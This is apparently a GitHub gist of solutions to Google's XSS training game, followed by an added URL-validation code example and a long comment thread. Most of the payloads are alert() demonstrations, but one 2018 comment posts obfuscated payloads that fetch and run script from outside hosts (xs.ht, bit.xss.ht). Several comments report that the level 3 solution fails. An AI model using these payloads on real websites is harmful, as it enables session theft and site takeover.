Solutions to the Google XSS Challenge
Hey All,
I am P.B.Surya.Subhash, a 17-year-old coder, hacker and student.
Recently I happened to see many posts about the "Google XSS Challenge", and I was fortunate enough to complete the levels.
These are the solutions for the challenges ;)
##############################################################################
Level 1: Hello, world of XSS
https://xss-game.appspot.com/level1/frame
query=<script>alert('xss')</script>
Well, that wasn't so tough... was it?
##############################################################################
Level 2: Persistence is key
https://xss-game.appspot.com/level2/frame
post-content=<img src='foobar' onerror='alert("xss")'>
#############################################################################
Level 3: That sinking feeling...
https://xss-game.appspot.com/level3/frame#1
URL=https://xss-game.appspot.com/level3/frame#1' onerror='alert("xss")'>
#############################################################################
Level 4: Context matters
https://xss-game.appspot.com/level4/frame
timer=');alert('xss
#############################################################################
Level 5: Breaking protocol
https://xss-game.appspot.com/level5/frame
URL=https://xss-game.appspot.com/level5/frame/signup?next=javascript%3Aalert%28%27xss%27%29
#############################################################################
Level 6: Follow the X
https://xss-game.appspot.com/level6/frame#/static/gadget.js
URL=https://xss-game.appspot.com/level6/frame#data:text/plain,alert('xss')
#############################################################################
Hope this will help you all to learn something..
Have a nice day,
Thanks to Google for giving me a chance to test my skills \m/
Thanks to Google again for the nice cake at the end. I like cakes so much ;)
Bye all..
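
Added example, not part of the original gist: the Level 5 and Level 6 solutions above both put a non-HTTP scheme (javascript: and data:) into a value the page treats as a URL. The code below shows the corresponding server- or client-side check, parsing the value and allowing only same-origin https URLs; the function names and the /static/ prefix rule are assumptions made for illustration.

```javascript
'use strict';

// Added example. BASE is the game origin as it appears in the URLs above;
// the function names are hypothetical.
const BASE = 'https://xss-game.appspot.com';

// Resolve an untrusted value against BASE and return the normalized URL only
// if it is https and same-origin; otherwise return null.
function sameOriginUrl(untrusted, base = BASE) {
  if (typeof untrusted !== 'string') return null;
  // Browsers drop tab/CR/LF while parsing URLs; refuse control characters
  // outright instead of trying to mirror that behaviour.
  if (/[\u0000-\u001f\u007f]/.test(untrusted)) return null;
  let url;
  try {
    url = new URL(untrusted.trim(), base);
  } catch (err) {
    return null; // not parseable as a URL at all
  }
  // javascript: and data: URLs parse fine, so the scheme check is what stops them.
  if (url.protocol !== 'https:') return null;
  if (url.origin !== new URL(base).origin) return null;
  return url.href;
}

// Value for a link target such as the level 5 `next` parameter.
// Falls back to the site root when the input is rejected.
function safeNextHref(next) {
  return sameOriginUrl(next) || BASE + '/';
}

// Value for a script source such as the level 6 fragment. The path is checked
// after normalization, so "/static/../x" cannot pass as "/static/".
function safeScriptSrc(fragment, allowedPrefix = '/static/') {
  const href = sameOriginUrl(fragment);
  if (href === null) return null;
  return new URL(href).pathname.startsWith(allowedPrefix) ? href : null;
}

// Inputs: the two payloads from this gist plus constructed samples.
const samples = ["javascript:alert('xss')", "data:text/plain,alert('xss')",
  '/static/gadget.js', '//other.example/gadget.js', '/static/../level1/frame'];
for (const s of samples) {
  console.log(JSON.stringify(s), '->', safeScriptSrc(s));
}
```

An allowlist on the parsed scheme and origin also rejects mixed-case spellings such as JaVaScRiPt:, because the URL parser lowercases the scheme before the comparison.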

Simon90Italy commented Sep 1, 2014

"> ">"


Simon90Italy commented Sep 1, 2014

"> ">"


ahmedsherif commented Sep 9, 2014

">


ahmedsherif commented Sep 9, 2014

">


ahmedsherif commented Sep 9, 2014

</textarea><>>


ahmedsherif commented Sep 9, 2014

</textarea>">


jjab92 commented Nov 18, 2015

"><img src=x onerror=;;alert('XSS')/>


jjab92 commented Nov 18, 2015

"><img src=x onclick=;;alert('XSS')/>


jjab92 commented Nov 18, 2015

'"()&%1 XSS") ;</script> <img src="<img src=search"/onerror=alert("Xss")//"> ">


ianborla commented Nov 18, 2015

This works, I think

using H1 hahaha

but not the <script>alert(0)</script> script


b2874196 commented Mar 28, 2016

+<a+id="a"href=javascript%26colon;alert%26lpar;1%26rpar;+id="a" style=width:100%25;height:100%25;position:fixed;left:0;top:0 x>Click me plz


Felix1Catus commented Apr 24, 2016

">

HI


Felix1Catus commented Apr 24, 2016

<iframe src="http://www.google.com"></iframe>

Felix1Catus commented Apr 24, 2016


Felix1Catus commented Apr 24, 2016


sunnybhasin commented Jul 11, 2016

good


sunnybhasin commented Jul 11, 2016


D0n9 commented Oct 31, 2016

nice


joe-rinaldi commented Nov 23, 2016

solution for level 3 doesn't work ?


bangladeshpentest commented Nov 27, 2016

"><img src=x onerror=prompt('XSS')>


bangladeshpentest commented Nov 27, 2016

"><img src=x onerror=prompt('XSS')>


bangladeshpentest commented Nov 27, 2016

%00<img src=x onerror=prompt('XSS')>


bkrall commented Dec 8, 2016


c-urly commented Feb 9, 2017

solution for level 3 is not working for me


honcbb commented Feb 15, 2017

"><img src=x onerror:alert(1)/>


honcbb commented Feb 15, 2017


ducptit commented Feb 23, 2017


ducptit commented Feb 23, 2017


AG-Systems commented Mar 15, 2017

Thank you


Skiba246 commented Apr 24, 2017


Skiba246 commented Apr 24, 2017


ghost commented May 7, 2017

styling with markdown is supported, why y'all flexin?


babajaggu commented Jun 11, 2017

Just a Test


babajaggu commented Jun 11, 2017



pradeepmehta commented Jul 26, 2017

hy


iosnotlari commented Sep 7, 2017

SMART ASS TORVALDS


Blablub91 commented Oct 4, 2017

Which type of XSS attack is used in the different levels?
In my opinion it might be:
Level 1 reflected XSS
Level 2 persistent XSS
Level 3 reflected or DOM-based XSS (I am not sure)
Level 4 reflected XSS
Level 5 DOM-based XSS
Level 6 DOM-based XSS (I am not sure)?

Thanks!


SLAVONchick commented Oct 11, 2017


lavaz12 commented Jan 12, 2018


lavaz12 commented Jan 12, 2018

<iframe width="560" height="315" src="https://www.youtube.com/embed/GowtoPSh6oM" frameborder="0" allow="autoplay; encrypted-media" allowfullscreen></iframe>

lavaz12 commented Jan 12, 2018


lavaz12 commented Jan 12, 2018


alpha6969 commented Mar 23, 2018

Guy, do you play the Google SQL injection game???
How do I do this? :'(
https://learn-web-tech.appspot.com/class/nullcon/section/1


kmustriver commented Apr 11, 2018


kmustriver commented Apr 11, 2018

<script>alert('12345678')<script>

SuperN1nja commented May 15, 2018

<script src="https://xs.ht/jquery.min.js"></script> <script src="https://xs.ht/x.js"></script> <script src="https://xs.ht"></script>

"><script src=https://xs.ht></script>

<script src=https://bit.xss.ht></script>

(80 chars)
<img src=x onerror=$.getScript("//xs.ht/x.js")>


SuperN1nja commented May 15, 2018

"><script src=https://bit.xss.ht></script>

javascript:eval('var a=document.createElement('script');a.src='https://xs.ht';document.body.appendChild(a)')

"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHMuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYQ=== autofocus>

"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHMuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYQ=== onerror=eval(atob(this.id))>

"><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHMuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYQ===>

"><iframe srcdoc="<script>var a=parent.document.createElement("script");a.src="https://bit.xss.ht";parent.document.body.appendChild(a);</script>">

<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//bit.xss.ht");a.send();</script> <script>$.getScript("//xs.ht")</script>">>">">#"#><<script src="https://xs.ht/jquery.min.js"></script> <script src="https://xs.ht/x.js"></script> <script src="https://xs.ht"></script>

"><script src=https://xs.ht></script>

<script src=https://bit.xss.ht></script>

(80 chars)
<img src=x onerror=$.getScript("//xs.ht/x.js")>


kres0345 commented May 23, 2018

The following disappears: :END: Damn, this kinda works. Pastebin of the code: https://pastebin.com/3fg3ZEBa


Konnexxary commented Jun 7, 2018

Hello this is a text that is being tested.


Konnexxary commented Jun 7, 2018


Konnexxary commented Jun 8, 2018

hi


Konnexxary commented Jun 8, 2018


wahengchang commented Jun 21, 2018

Solution v3 does not work


OfficialORHTeam commented Jun 28, 2018

post-content=


awkonecki commented Jul 4, 2018

anyone try problem 4 lately, can't seem to get it to work.


ahmedselim2017 commented Nov 13, 2018


RAVIPRAJ commented Dec 4, 2018

why data:text/plain in level 6


MathiasTech commented Apr 14, 2019


Babloome commented May 6, 2019

Hello Franndsss..


Babloome commented May 6, 2019


Babloome commented May 6, 2019

Test


acer4666 commented Jun 3, 2019

In response to @Blablub91:

> Which type of XSS attack is used in the different levels?
> In my opinion it might be:
> Level 1 reflected XSS
> Level 2 persistent XSS
> Level 3 reflected or DOM-based XSS (I am not sure)
> Level 4 reflected XSS
> Level 5 DOM-based XSS
> Level 6 DOM-based XSS (I am not sure)?
>
> Thanks!

I find a more helpful classification to be the four-box model (https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting#Client_XSS), in which they would be classified as:

level 1. reflected server xss
level 2. stored client xss (dom-based)
level 3. reflected client xss (dom-based)
level 4. reflected server xss
level 5. reflected server xss
level 6. reflected client xss (dom-based)

Level 2 is possibly attempting to emulate a stored server xss, but the posts are stored in the browser's localStorage which is part of the DOM. For level 5, the input is rendered in a template on the server and sent back as part of the response.


Ocelot124286 commented Jun 27, 2019


jayateertha043 commented Aug 7, 2019


FIFIHFIJEHGUHIEUHG commented Nov 9, 2019

<script>alert(0)</script> script

FIFIHFIJEHGUHIEUHG commented Nov 9, 2019

hello


FIFIHFIJEHGUHIEUHG commented Nov 9, 2019

<script alert("hi") </script>

FIFIHFIJEHGUHIEUHG commented Nov 9, 2019

<script> alert("hi") </script>

Arifulislam43 commented Nov 14, 2019

NICE


Aaronstone0056 commented Nov 16, 2019

<script>alert('xss')</script>

Aaronstone0056 commented Nov 16, 2019
